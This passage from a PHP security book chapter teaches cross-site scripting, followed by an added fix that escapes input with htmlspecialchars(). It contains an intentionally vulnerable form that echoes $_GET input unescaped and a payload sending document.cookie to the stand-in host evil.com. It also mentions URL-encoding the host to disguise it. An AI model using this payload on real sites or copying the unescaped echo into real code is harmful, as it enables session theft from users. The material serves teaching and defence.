CHAPTER 5 – Cross-Site Scripting

By using the cross-site scripting technique, an attacker might be able to execute pieces of client-side scripting languages, such as JavaScript, and steal cookies or other sensitive data. Cross-site scripting is really not hard. The attacker only needs a way to insert raw data into the HTML of the site. For example, the attacker might enter <script language="JavaScript">alert();</script> into an input box that does not strip any HTML tags. The following script illustrates this possibility:

<html>
<head><title>XSS example</title></head>
<body>
<form>
<input name='foo' value='<?php echo $_GET['foo']; ?>'>
</form>
</body>
</html>

It's a straightforward script. Suppose the attacker types the following into your form field:

'><script language='JavaScript'>alert('boo!');</script><a b='

The JavaScript code results in the pop-up shown in Figure 5.2.

Fig. 5.2 Effects of JavaScript in unchecked input.

Of course, this is not scary. However, suppose instead of this innocent pop-up, the following is input:

'><script language='JavaScript'>document.location='http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script><a b='

When a user is tricked into activating this URL, the contents of your cookie are sent to the evil.com guys. Of course, a user is not likely to click a URL with evil.com in it, but the bad guys can change the "evil.com" to a URL-encoded form that would look less "weird," especially to beginning Internet users.
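The fix for the script above is to encode the value for the HTML attribute context it is echoed into, rather than to strip tags. The following is an added example, not code from the book: the form's input rendered through htmlspecialchars(), with the page's first payload fed in as a constructed test value; render_input() is a hypothetical helper name.

```php
<?php
// Added example, not from the book: the page's <input> rewritten so that
// $_GET['foo'] is escaped for an HTML attribute before it is echoed.

function render_input(string $value): string
{
    // ENT_QUOTES escapes both ' and ", so the value can no longer close the
    // single-quoted attribute, which is what the page's payload relies on.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input name='foo' value='{$safe}'>";
}

// The payload from the text, constructed here as test input.
$payload = "'><script language='JavaScript'>alert('boo!');</script><a b='";

$html = render_input($payload);
echo $html, PHP_EOL;

// Sanity check: no raw quote or angle bracket survives inside the attribute,
// so the browser sees one harmless string value and no new tags.
$prefix = "<input name='foo' value='";
$inner  = substr($html, strlen($prefix), -2);
if (strpbrk($inner, "<>'\"") !== false) {
    fwrite(STDERR, "escaping failed\n");
    exit(1);
}
echo "attribute value is inert\n";

// In the page's own script the echo line becomes:
//   value='<?php echo htmlspecialchars($_GET['foo'] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ' followed by the closing PHP tag
```

htmlspecialchars() is correct only for HTML text and attribute contexts; a value placed inside a script block, a URL, or a CSS property needs the encoding appropriate to that context instead.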